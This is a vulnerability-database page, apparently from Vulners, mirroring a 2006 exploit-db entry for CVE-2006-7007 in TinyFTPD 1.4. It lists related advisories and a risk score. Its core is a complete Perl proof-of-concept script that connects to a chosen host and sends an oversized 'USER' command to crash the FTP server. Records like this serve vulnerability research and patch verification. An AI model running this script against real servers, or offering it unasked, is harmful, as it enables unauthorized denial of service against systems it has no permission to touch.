Lucene search
+L

TinyFTPD 1.4 - 'USER' Remote Buffer Overflow (Denial of Service) (PoC)

🗓️ 06 May 2006 00:00:00Reported by [Oo]Type 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 52 Views

TinyFTPD 1.4 Remote Buffer Overflow (Denial of Service) Po

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2006-7007
12 Feb 200723:00
cve
cvelist
Cvelist
CVE-2006-7007
12 Feb 200723:00
cvelist
euvd
EUVD
EUVD-2006-6989
7 Oct 202500:30
euvd
nvd
NVD
CVE-2006-7007
12 Feb 200723:28
nvd
securityvulns
securityvulns
Tiny FTPd buffer overflow
13 Feb 200700:00
securityvulns
#!/bin/perl
#
# Title: TinyFTPD <= 1.4 USER command D.O.S
# Credits: [Oo]
#
#
use IO::Socket;

print "[i] TinyFTPD <= 1.4 USER command D.O.S\n";
print "[i] coded by [Oo]\n";


if (@ARGV < 2)
{
 print "\n[*] Usage: tinyftpd_dos.pl host port\n";
 print "[*] Exemple: tinyftpd_dos.pl 192.168.0.1 21\n";
 exit;
}


$ip = $ARGV[0];
$port = $ARGV[1];

$exploit = "(A" x 9000;

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$ip", PeerPort => "$port") || die "\n[-] Connecting: Failed!\n";
print "\n[+] Connecting: Ok!\n";
print "[+] Sending bad request...\n";

print $socket "USER $exploit\n";
sleep(5);
close($socket);

print "[?] DoSed?\n";

# milw0rm.com [2006-05-06]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

06 May 2006 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.8
EPSS0.03623
52